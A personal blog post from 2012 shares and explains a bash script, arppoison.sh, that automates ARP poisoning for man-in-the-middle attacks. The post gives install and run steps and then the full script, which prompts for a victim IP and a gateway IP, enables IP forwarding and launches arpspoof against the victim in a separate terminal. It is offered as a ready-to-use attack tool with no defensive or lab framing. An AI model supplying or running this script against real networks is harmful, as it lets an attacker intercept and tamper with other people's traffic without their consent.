Tuesday, March 27, 2012

arppoison.sh - A script for to simplify ARP Poisoning for MITM attacks

   Last Night I found this script which is a script I coded years ago, 2007 to be exact. I love it when I find old stuff like this so I thought I would share it here. The script is called arppoison.sh and as the name suggest it is used to ARP poison two targets using arpspoof. Since it uses arpspoof you need to have it install. If you are using backtrack 5 it should already be installed. If you are using Ubuntu you can easily install it using apt-get to download the dsniff suite like so:

sudo apt-get install dsniff
This script is really simple to use:
  1. copy the text below into a word editor like nano or gedit.
  2. save it as arppoison.sh.
  3. run the following command against it: chmod +x arppoison.sh
  4. use the following command to run it: sudo ./arppoison.sh
  5. enter in the victim IP
  6. enter in the Gateway IP (i.e. the router)
  7. sit back as it enables IP forwarding and launches another shell running arpspoof.

   While this script is simple it is useful as it helps speed up the time it takes to launch these attacks by handling the ip forwarding configuration, launching the attack in a separate shell saving you from having to start another and load it to root. Pretty much just launch it and keep working. The code for the script is below the screen shot. Don't forget to change the niccard variable to whatever your adapter is called (in my case wlan0). Hope this helps and feel free to let me know if you have any questions.





==================================================================

#!/bin/bash
niccard=wlan0
if [[ $EUID -ne 0 ]]; then
echo -e "\n\t\t\t\033[1m \033[31m Script must be run as root! \033[0m \n"
echo -e "\t\t\t Example: sudo $0 \n"
exit 1
else
echo -e "\n\033[1;32m#######################################"
echo -e "# ARP Poison Script #"
echo -e "#######################################"
echo -e " \033[1;31mCoded By:\033[0m Travis Phillips"
echo -e " \033[1;31mDate Released:\033[0m 03/27/2012"
echo -e " \033[1;31mWebsite:\033[0m http://theunl33t.blogspot.com\n\033[0m"
echo -n "Please enter target's IP: "
read victimIP
echo -n "Please enter Gateway's IP: "
read gatewayIP
echo -e "\n\t\t ---===[Time to Pwn]===---\n\n\n"
echo -e "\t\t--==[Targets]==--"
echo -e "\t\tTarget: $victimIP"
echo -e "\t\tGateway: $gatewayIP \n\n"
echo -e "[*] Enabling IP Forwarding \n"
echo "1" > /proc/sys/net/ipv4/ip_forward
echo -e "[*] Starting ARP Poisoning between $victimIP and $gatewayIP! \n"
xterm -e "arpspoof -i $niccard -t $victimIP $gatewayIP" &
fi

==================================================================